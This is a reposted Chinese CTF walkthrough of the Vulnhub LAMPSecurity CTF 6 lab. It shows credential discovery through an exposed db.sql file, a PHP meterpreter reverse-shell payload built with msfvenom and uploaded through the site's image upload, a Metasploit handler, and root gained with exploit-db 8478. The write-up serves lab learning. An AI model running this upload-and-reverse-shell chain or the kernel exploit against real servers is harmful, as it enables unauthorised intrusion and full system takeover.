ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

【Vulnhub-LAMPSecurity】CTF 6

2022-01-26 16:36:10  阅读:184  来源: 互联网

标签:尝试 LAMPSecurity PID 192.168 CTF Vulnhub PHP 上传 8478


0x00环境

攻击机IP:192.168.1.28
目标机IP:192.168.1.24

0x01实战

端口扫描

nmap -sV -p- 192.168.1.24

在这里插入图片描述

可以看到开放了很多端口

目录扫描

扫描出一堆东西
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QfspI76M-1643184742322)(img/image-20220126094242126.png)]

漏洞发现

根据扫描出来的目录查找发现

直接可以看到phpinfo
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-F5ai6RPe-1643184742323)(img/image-20220126094346525.png)]

可以访问db.sql文件,直接得到数据库账户和密码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IEaQuKKm-1643184742324)(img/image-20220126095209987.png)]

等还有其它的一些东西就不列举了。。。

漏洞利用

访问80端口HTTP服务可以知道本网站由Toby Victor开发。它由PHP和MySQL提供支持,并托管在CentOSlinux 服务器上。
在这里插入图片描述

尝试使用上面得到的账户admin/adminpass登录网站
在这里插入图片描述

成功登录,登录后我们可以发现我们可以编辑页面并上传图片
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Hp4QQvv-1643184742326)(img/image-20220126100427410.png)]

而且前面我们在网站主页得知是支持PHP的,那么我们可以尝试上传木马文件反弹shell

创建PHP木马文件尝试通过文件上传来上传

msfvenom -p php/meterpreter/reverse_tcp -o /root/shell.php  lhost=192.168.1.28 lport=4444

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3WhR9qHs-1643184742326)(img/image-20220126101212409.png)]

尝试上传,如果失败再尝试绕过
在这里插入图片描述

在主页可以看到上传成功
在这里插入图片描述

创建监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.28
set lport 4444
run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-n2xWwy8O-1643184742328)(img/image-20220126101655914.png)]

在主页上点击Read more即可反弹shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rpUHyEzV-1643184742329)(img/image-20220126101745127.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TjUhoJSo-1643184742329)(img/image-20220126101814703.png)]

提权

查看系统信息

sysinfo

不知为何无法执行命令
在这里插入图片描述

使用老版kali(192.168.1.12)
在这里插入图片描述

内核版本为2.6.18-92.el5,在互联网查漏洞利用https://www.exploit-db.com/exploits/8478
在这里插入图片描述

将提权脚本下载并查看
在这里插入图片描述

将dos格式修改为linux格式

dos2unix 8478.sh

在这里插入图片描述

上传到靶机上的tmp目录中
在这里插入图片描述

赋予脚本执行权限并执行

chmod +x 8478.sh

在这里插入图片描述

报错,因为必须为脚本提供正确的 PID 才能使代码正常工作。所以现在我们必须找到一个合适的 PID,并在该 PID 的帮助下运行脚本

cat /proc/net/netlink

在这里插入图片描述

执行脚本,多尝试几次,成功得到root权限

./8478.sh 568

在这里插入图片描述
在这里插入图片描述

标签:尝试,LAMPSecurity,PID,192.168,CTF,Vulnhub,PHP,上传,8478
来源: https://blog.csdn.net/qq_44276741/article/details/122704057

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有